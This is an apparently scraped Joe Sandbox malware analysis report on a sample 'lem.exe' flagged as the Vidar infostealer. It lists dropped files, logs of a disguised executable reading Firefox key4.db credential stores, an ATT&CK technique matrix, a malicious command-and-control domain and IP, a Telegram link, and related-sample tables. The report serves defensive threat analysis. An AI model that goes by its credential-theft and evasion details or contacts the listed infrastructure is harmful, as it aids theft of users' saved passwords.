Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db	Jump to behavior

Source: Yara match	File source: 00000006.00000002.3140989394.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Start10ThemeEdit.exe PID: 6488, type: MEMORYSTR

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Create Account	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	112 Process Injection	2 Obfuscated Files or Information	1 Credentials in Registry	4 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	1 Timestomp	NTDS	46 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	2 Clipboard Data	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	41 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	13 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	112 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lem.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\hvaa1\00z58g

C:\ProgramData\hvaa1\3e3wtr

C:\ProgramData\hvaa1\5f3wl6x4e

C:\ProgramData\hvaa1\89hl6x

Windows Analysis Report
lem.exe

Source	Detection	Scanner
C:\ProgramData\hvaa1\ieusjw	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-BKBRT.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-CH1BS.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	7%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	7%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\AdobeXMPFiles.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\BCSRuntime.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\IEAWSDC.DLL (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\MSSP7ES.DLL (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.Build.Engine.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.Developer.IdentityService.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.ProgramSynthesis.Transformation.Tree.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.TeamFoundation.WorkItemTracking.Controls.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.CMake.Project.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.DesignTools.Diagnostics.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.QualityTools.ExecutionCommon.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Microsoft.VisualStudio.Workspace.Implementation.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\PresentationBuildTasks.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\System.Data.SQLite.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\VirtualBoxVM.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\WzAddrycts64.dll (copy)	2%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\WzWXFog64.dll (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\edit_test.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\git-upload-archive.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\gss-server.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-2TQSG.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-3GPBO.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-607DJ.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-8NH1K.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-BE8GU.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-E6S09.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-OMCH5.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-PF777.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-RRJFN.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-U7QHJ.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\is-V97C3.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\klist.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\kvno.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\openssl.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\p11-kit.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\sexp-conv.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\trust.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\wintoast.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\bin\wish.exe (copy)	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-1JUGA.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-2G042.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\is-4I031.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://anglebug.com/7369l	0%	Avira URL Cloud	safe
http://crl.com	0%	Avira URL Cloud	safe
http://anglebug.com/3584k	0%	Avira URL Cloud	safe
https://www.0e0.jp.eu.org/ntent	100%	Avira URL Cloud	malware
https://www.0e0.jp.eu.org/Tc#&	100%	Avira URL Cloud	malware
http://anglebug.com/4551$	0%	Avira URL Cloud	safe
https://myactivity.goo/	0%	Avira URL Cloud	safe
https://anglebug.com/7320i	0%	Avira URL Cloud	safe

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
plus.l.google.com	216.58.206.78	true	false	high
a416.dscd.akamai.net	2.19.11.100	true	false	high
t.me	149.154.167.99	true	false	high
a-0003.a-msedge.net	204.79.197.203	true	false	high
c-msn-pme.trafficmanager.net	13.74.129.1	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
s-part-0039.t-0009.t-msedge.net	13.107.246.67	true	false	high
ax-0001.ax-msedge.net	150.171.27.10	true	false	high
play.google.com	142.250.181.238	true	false	high
www.0e0.jp.eu.org	116.202.180.73	true	true	unknown
sb.scorecardresearch.com	18.245.60.76	true	false	high
www.google.com	142.250.186.164	true	false	high
googlehosted.l.googleusercontent.com	142.250.186.97	true	false	high
e28578.d.akamaiedge.net	23.15.178.242	true	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Name	Malicious	Reputation
https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js	false	high
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531	false	high
https://sb.scorecardresearch.com/b2?rn=1739995396296&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=33005DC6DCF769042869485EDD95682F&cs_fpit=o&cs_fpdm=null&cs_fpdt=null	false	high
https://ntp.msn.com/edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true	false	high
https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.ea367c17e754dc6b9855.js	false	high
https://c.msn.com/c.gif?rnd=1739995396296&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b298872b9808410fad3fce25355c5981&activityId=b298872b9808410fad3fce25355c5981&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA202814465D4A5997A42BDA463D968E&MUID=33005DC6DCF769042869485EDD95682F	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
https://t.me/g02f04	false	high

IP	Domain	Country	ASN	ASN Name	Malicious
216.58.206.78	plus.l.google.com	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
23.15.178.242	e28578.d.akamaiedge.net	United States	20940	AKAMAI-ASN1EU	false
23.219.82.90	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.181.238	play.google.com	United States	15169	GOOGLEUS	false
23.219.82.91	unknown	United States	20940	AKAMAI-ASN1EU	false
13.74.129.1	c-msn-pme.trafficmanager.net	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
20.110.205.119	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
204.79.197.219	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
142.250.186.97	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false
18.245.60.76	sb.scorecardresearch.com	United States	16509	AMAZON-02US	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
18.173.132.98	unknown	United States	3	MIT-GATEWAYSUS	false
2.19.11.100	a416.dscd.akamai.net	European Union	719	ELISA-ASHelsinkiFinlandEU	false
20.189.173.28	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
23.219.82.81	unknown	United States	20940	AKAMAI-ASN1EU	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
116.202.180.73	www.0e0.jp.eu.org	Germany	24940	HETZNER-ASDE	true
204.79.197.203	a-0003.a-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1619387
Start date and time:	2025-02-19 21:01:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	lem.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@76/360@28/22
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 90 Number of non-executed functions: 168
Cookbook Comments:	Found application associated with file extension: .exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
23.219.82.90	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
23.219.82.91	82.msi	Get hash	malicious	Unknown	Browse
23.219.82.91	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
13.74.129.1	http://liberrex.com	Get hash	malicious	Unknown	Browse
	https://gaamnexloginn.webflow.io/	Get hash	malicious	Unknown	Browse
	4R4m984y6e.msi	Get hash	malicious	Unknown	Browse
	1.msi	Get hash	malicious	Unknown	Browse
	Xw9oZv75Ze.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse
	https://shorten.is/AdsPayments101	Get hash	malicious	HTMLPhisher	Browse
	https://swbjhbhjsw.blob.core.windows.net/qacfjixdcfv/aqfrtjn.html	Get hash	malicious	Unknown	Browse
	updater.exe	Get hash	malicious	Vidar	Browse
	http://geminenilogoginn.webflow.io/	Get hash	malicious	HTMLPhisher	Browse
	Setup.exe	Get hash	malicious	ACR Stealer	Browse
149.154.167.99	http://45.142.208.144.sslip.io/blog/	Get hash	malicious	Unknown	Browse	telegram.org/img/emoji/40/F09F9889.png
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	telegram.org/img/favicon.ico
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://cache.netflix.com.id1.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
	http://investors.spotify.com.sg2.wuush.us.kg/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://bekaaviator.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	https://sbg.kwo.mybluehost.me/united-airlines/	Get hash	malicious	Unknown	Browse	50.6.154.184
	WyPb2uVZ1P.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	http://voaqoczzyxj.work/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	https://telegramcom.kv252.top/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	keynote.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	updater.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	lnst#U0430Il#U0435r86x.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
a416.dscd.akamai.net	8tlRyRNJXL.lnk	Get hash	malicious	MalLnk	Browse	104.124.11.19
	4R4m984y6e.msi	Get hash	malicious	Unknown	Browse	2.22.242.105
	1.msi	Get hash	malicious	Unknown	Browse	2.22.242.11
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	2.19.11.100
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	2.16.164.33
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	2.19.11.120
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	2.16.164.120
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	2.19.11.120
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	2.16.164.33
	Shipment-100032756.lnk	Get hash	malicious	Unknown	Browse	2.19.11.100
chrome.cloudflare-dns.com	8tlRyRNJXL.lnk	Get hash	malicious	MalLnk	Browse	172.64.41.3
	#U5b5f#U8f69#U7f511.0 64#U4f4d.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	IP Firewall Security.exe	Get hash	malicious	Unknown	Browse	162.159.61.3
	4R4m984y6e.msi	Get hash	malicious	Unknown	Browse	172.64.41.3
	1.msi	Get hash	malicious	Unknown	Browse	162.159.61.3
	Fd-Employee-Handbook.pdf	Get hash	malicious	Unknown	Browse	172.64.41.3
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	162.159.61.3
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	172.64.41.3
	Payment_Activity_0104_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	172.64.41.3
	Payment_Activity_0079_2025-2-17.vbs	Get hash	malicious	Unknown	Browse	162.159.61.3
a-0003.a-msedge.net	4R4m984y6e.msi	Get hash	malicious	Unknown	Browse	204.79.197.203
	1.msi	Get hash	malicious	Unknown	Browse	204.79.197.203
	Xw9oZv75Ze.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar	Browse	204.79.197.203
	hHtR1O06GH.exe	Get hash	malicious	Amadey, Healer AV Disabler, LummaC Stealer, Stealc, Vidar	Browse	204.79.197.203
	MDE_File_Sample_baee32e2367a787814415d166abb7bc5b9061c5c.zip	Get hash	malicious	Unknown	Browse	204.79.197.203
	updater.exe	Get hash	malicious	Vidar	Browse	204.79.197.203
	Setup.exe	Get hash	malicious	ACR Stealer	Browse	204.79.197.203
	Xclient.vbs	Get hash	malicious	AsyncRAT, XWorm	Browse	204.79.197.203
	H3Ze9Uj.exe	Get hash	malicious	XWorm	Browse	204.79.197.203
	QEIFBCQW.msi	Get hash	malicious	Unknown	Browse	204.79.197.203

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	EFT Remittance_(Rtotino)CQDM.html	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://certificate.hypnotherapy-training.co.nz	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://www.irmaflores.net/suh/*	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://atstrack.com/customer-support/software.html	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://deepseekcaptcha.top/verif.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	23.1.237.91
	http://elcharrousa.com	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://gaamnexloginn.webflow.io/	Get hash	malicious	Unknown	Browse	23.1.237.91
	https://5510007.top/	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://honeyyy853.github.io/netflixClone/	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
	https://privacytrackersocialinfluence.vercel.app/3ae&25&93cf6=5a&1eGK9d0xe13da4b=D400e.html	Get hash	malicious	Unknown	Browse	23.1.237.91
37f463bf4616ecd445d4a1937da06e19	1.exe	Get hash	malicious	Vidar	Browse	149.154.167.99 116.202.180.73
	Finerede.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	Bibliofils.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	factura solicitada..exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73
	Researches.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	Vidneafhring.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73
	Doc171836.js	Get hash	malicious	BruteRatel, Latrodectus	Browse	149.154.167.99 116.202.180.73
	DHL RPA GRBP Template.PDF.js	Get hash	malicious	Remcos	Browse	149.154.167.99 116.202.180.73
	rSlutelementer.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.99 116.202.180.73
	Payment Summary 2025 11 2.exe	Get hash	malicious	GuLoader	Browse	149.154.167.99 116.202.180.73

Process:	C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	4.976174799333973
Encrypted:	false
SSDEEP:	24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
MD5:	ECC51190BD585AB376691BBDDF2A638B
SHA1:	84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
SHA-256:	6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
SHA-512:	C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
Malicious:	false
Preview:	.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\ [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc